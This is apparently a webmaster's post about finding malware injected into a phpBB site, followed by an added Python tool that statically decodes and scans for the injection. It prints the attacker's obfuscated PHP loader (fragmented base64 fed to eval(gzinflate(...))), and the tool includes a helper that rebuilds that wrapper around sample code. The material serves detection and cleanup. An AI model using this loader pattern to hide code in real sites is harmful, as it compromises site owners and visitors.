Sometimes the hackers merely change template or HTML files. These are fairly easy to track down: open up your template files and look for what doesn't belong.
In the /includes folder of my Info-Mac phpBB 3 folder, I found a rogue file named body.php. It had neither a recent modification nor creation date, so it was hard to find, but I did find it by comparing what was supposed to be in that folder with what actually was there. One extra file! Opening it shows a lot of hacker-ish code, including a big ASCII spider.
Other times, they change the PHP or other scripting files. This is harder to track down, but I wanted to share some code from the most recent hacking situation so that others may find it useful and know what to look out for.
I had this inserted into many PHP files here at Info-Mac. It builds a variable named sosddsfagck out of concatenated string fragments, base64-decodes it, gzinflates the result and hands it to eval(). The inflated content itself includes more encrypted PHP code. This is the format of what I saw:
Code:
$sosddsfagck='bZBBa8MwDIXvhf4HEQq2ISQdvYyWwi5jPe6Q2z';
$sosddsfagck=$sosddsfagck.'pGltqtmWMZWVvGxv77vGQZWalPst7T45M0EdIT';
$sosddsfagck=$sosddsfagck.'6YDE1h/lUm3ms0XE5gW2cGN+CgzaS/FRG0t1h+';
$sosddsfagck=$sosddsfagck.'QORYOtyOG691oje7uazz4XDXrWnrdZlhQA05Fl';
$sosddsfagck=$sosddsfagck.'DYMhB3F3W8GJOazL8iyuXDkbeVXwO8Ouqu7Lq2';
$sosddsfagck=$sosddsfagck.'IpimxPe5+pi1k7jLyGc6phZDLWnazTcgR7eExb';
$sosddsfagck=$sosddsfagck.'maPm+Buk1GbUkmLb4PCgpUjbje0hRr/VTjLZVs';
$sosddsfagck=$sosddsfagck.'bX58j0l5hD+gWMk8YEIb0BvnEYR/j+wv8u9fUN';
eval(gzinflate(base64_decode($sosddsfagck)));
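Here is an added example (my own code, not from the post or from phpBB) that does both checks the post describes: it diffs a folder listing against an expected manifest (the "one extra file" check that turned up body.php), and it scans PHP source for the eval(gzinflate(base64_decode())) chain, stitches the concatenated fragments back together, and inflates the blob statically with zlib so the hidden code can be read without ever running it. Because the post notes that the inflated content carries yet another encoded layer, the scanner recurses into what it decodes. The injected sample it runs on is constructed with a harmless payload (the blob quoted in the post is truncated and cannot be decoded); the manifest file names and the variable name "inner" are assumptions.

```python
"""Added example (not from the original post): static decoder and scanner for the
eval(gzinflate(base64_decode($var))) injection pattern, plus a listing diff for the
"one extra file" check. Sample input is constructed; nothing is executed."""
import base64
import os
import re
import zlib

# Matches the final statement of the injection and captures the eval'd variable name.
EVAL_CHAIN = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*\$(\w+)\s*\)", re.I)


def raw_deflate(data: bytes) -> bytes:
    """Raw DEFLATE stream, the format PHP's gzdeflate() emits (no zlib/gzip header)."""
    c = zlib.compressobj(level=9, wbits=-15)
    return c.compress(data) + c.flush()


def raw_inflate(data: bytes) -> bytes:
    """Inverse of raw_deflate; equivalent to PHP's gzinflate()."""
    return zlib.decompress(data, wbits=-15)


def build_layer(plain_php: str, var: str, chunk: int = 38) -> str:
    """Constructed helper: wrap PHP source in the same shape as the injected code from
    the post (38-char fragments concatenated into one variable, then eval'd).
    Used only to produce sample input for the scanner."""
    blob = base64.b64encode(raw_deflate(plain_php.encode())).decode()
    parts = [blob[i:i + chunk] for i in range(0, len(blob), chunk)]
    stmts = [f"${var}='{parts[0]}';"]
    stmts += [f"${var}=${var}.'{p}';" for p in parts[1:]]
    stmts.append(f"eval(gzinflate(base64_decode(${var})));")
    return "<?php\n" + " ".join(stmts) + "\n"


def reassemble(var: str, source: str) -> str:
    """Collect every $var='...'; and $var=$var.'...'; fragment in order and join them."""
    v = re.escape(var)
    frag = re.compile(r"\$" + v + r"\s*=\s*(?:\$" + v + r"\s*\.\s*)?'([^']*)'\s*;")
    return "".join(m.group(1) for m in frag.finditer(source))


def decode_payload(var: str, source: str):
    """Statically decode the blob; returns None if it is not valid base64 + raw deflate."""
    try:
        raw = base64.b64decode(reassemble(var, source), validate=True)
        return raw_inflate(raw).decode("utf-8", "replace")
    except (ValueError, zlib.error):
        return None


def scan_source(source: str, depth: int = 0, max_depth: int = 5) -> list:
    """Find each eval chain, decode it, and recurse into the decoded code, since the
    inflated content may itself be another encoded layer."""
    findings = []
    for m in EVAL_CHAIN.finditer(source):
        var = m.group(1)
        decoded = decode_payload(var, source)
        findings.append({"var": var, "depth": depth, "decoded": decoded})
        if decoded is not None and depth < max_depth:
            findings.extend(scan_source(decoded, depth + 1, max_depth))
    return findings


def diff_listing(actual, expected):
    """Return (extra, missing) names: the comparison that exposed the rogue body.php."""
    actual, expected = set(actual), set(expected)
    return sorted(actual - expected), sorted(expected - actual)


def scan_tree(root: str) -> dict:
    """Walk a web root and report every .php file that contains the eval chain."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_source(fh.read())
                if found:
                    hits[path] = found
    return hits


# Constructed two-layer sample; the outer variable name is the one from the post.
CONSTRUCTED_INNER = build_layer("<?php echo 'hi'; ?>", "inner")
CONSTRUCTED_SAMPLE = build_layer(CONSTRUCTED_INNER, "sosddsfagck")

if __name__ == "__main__":
    for f in scan_source(CONSTRUCTED_SAMPLE):
        print(f"depth {f['depth']} var ${f['var']} ->\n{f['decoded']}")
    # Assumed manifest for an includes/ folder: everything not in it is suspect.
    print(diff_listing(["functions.php", "body.php"], ["functions.php"]))
```

Run scan_tree() against a copy of the web root rather than the live site, and treat every decoded layer as text to read, never as code to run: the point of decoding statically is that the attacker's payload never gets an interpreter. The listing diff needs a trusted manifest, such as the file list from a clean phpBB download of the same version.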